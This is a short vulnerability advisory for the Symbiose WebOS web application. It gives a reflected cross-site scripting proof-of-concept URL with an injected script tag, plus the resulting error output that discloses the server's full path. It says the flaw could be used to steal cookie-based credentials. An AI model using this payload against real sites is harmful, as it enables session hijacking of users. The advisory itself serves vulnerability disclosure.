# Exploit Title: Symbiose Webos - XSS / FPD
# Date: 04 July 2014
# Exploit Author: G4eL
# Download: http://symbiose.fr.cr/
# Demo: http://webos.symbiose.fr.cr/
# Tested on: Ubuntu

http://[domain]/usr/?path=/usr/&type=1<script>alert(123)</script>

# Results :


Fatal error: Class 'lib\ctrl\rawDataCall\1<script>alert(123)</script>Controller' not found in /home/user/public_html/lib/Application.class.php on line 56

1- Cross Site Scripting (alert 123)
2- Full Path Disclosure (/home/user/public_html/)

# Issue Details :

A remote attacker could exploit this vulnerability using the host 
parameter in a specially-crafted URL to execute script in a victim's Web 
browser within the security context of the hosting Web site, once the 
URL is clicked. An attacker could use this vulnerability to steal the 
victim's cookie-based authentication credentials.

# by G4eL
# Skype : live:s3cur3